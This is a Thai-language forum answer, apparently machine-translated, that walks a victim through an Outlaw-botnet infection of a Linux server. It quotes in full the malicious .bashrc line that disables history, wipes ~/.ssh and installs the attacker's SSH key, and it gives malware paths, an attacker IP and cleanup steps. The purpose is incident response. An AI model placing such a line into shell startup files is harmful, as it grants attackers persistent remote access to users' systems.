เกิดขึ้นกับฉันและฉันสังเกตเห็นเมื่อวานนี้ ฉันตรวจสอบไฟล์/var/log/syslog
และ IP นี้ (185.234.218.40) ดูเหมือนว่าจะทำงานโดยอัตโนมัติ cronjobs
ฉันตรวจสอบแล้วในhttp://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) และมีรายงานบางส่วน ไฟล์เหล่านี้ถูกแก้ไขโดยโทรจัน:
- .bashrc
- .ssh / authorized_keys
ฉันพบสิ่งนี้ในตอนท้ายของ.bashrc
(ซึ่งจะถูกดำเนินการในแต่ละครั้งที่มีการเปิดทุบตี):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
เป็นการลบauthorized_keys
ไฟล์ของคุณซึ่งเป็นรายการของคีย์ SSH ที่ได้รับอนุญาตให้เชื่อมต่อโดยไม่มีรหัสผ่าน จากนั้นจะเพิ่มคีย์ SSH ของผู้โจมตี:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
นอกจากนี้ฉันพบโฟลเดอร์นี้: /tmp/.X13-unix/.rsync
ที่มัลแวร์ทั้งหมดอยู่ที่ไหน ฉันพบไฟล์/tmp/.X13-unix/.rsync/c/ip
หนึ่งไฟล์ซึ่งมีที่อยู่ IP 70,000 รายการซึ่งส่วนใหญ่เป็นเหยื่อหรือเซิร์ฟเวอร์โหนด
มี 2 วิธีแก้ไข: A:
เพิ่มไฟร์วอลล์ที่บล็อกการเชื่อมต่อขาออกทั้งหมดยกเว้นพอร์ต 22 และอื่น ๆ ที่คุณพบว่าจำเป็นและเปิดใช้งาน fail2ban โปรแกรมที่ห้ามที่อยู่ IP หลังจาก X พยายามรหัสผ่านล้มเหลว
ฆ่างาน cron ทั้งหมด:
ps aux | grep cron
จากนั้นฆ่า PID ที่ปรากฏขึ้น
เปลี่ยนรหัสผ่านของคุณเป็นรหัสที่ปลอดภัย
B:
สำรองไฟล์หรือโฟลเดอร์ใด ๆ ที่คุณต้องการหรือต้องการ
รีเซ็ตเซิร์ฟเวอร์และติดตั้ง Ubuntu ใหม่หรือสร้างหยดใหม่โดยตรง
อย่างที่ Thom Wiggers กล่าวว่าคุณเป็นส่วนหนึ่งของบ็อตเน็ตการขุด bitcoin และเซิร์ฟเวอร์ของคุณมีแบ็คดอร์ แบ็คดอร์ใช้ประโยชน์จาก perl ซึ่งเป็นไฟล์ที่อยู่ที่นี่: /tmp/.X13-unix/.rsync/b/run
มีสิ่งนี้ ( https://pastebin.com/ceP2jsUy )
โฟลเดอร์ที่น่าสงสัยที่สุดที่ฉันพบคือ:
ในที่สุดก็มีบทความเกี่ยวกับ Perl Backdoor ที่นี่:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
ฉันหวังว่าคุณจะพบว่ามีประโยชน์นี้
.firefoxcatche
อาจจะไม่มีอะไรเกี่ยวข้องกับ firefox - นี่อาจเป็นนักขุด bitcoin หรือไม่? ลองอัปโหลดไฟล์ที่เรียกทำงานไปยัง virustotal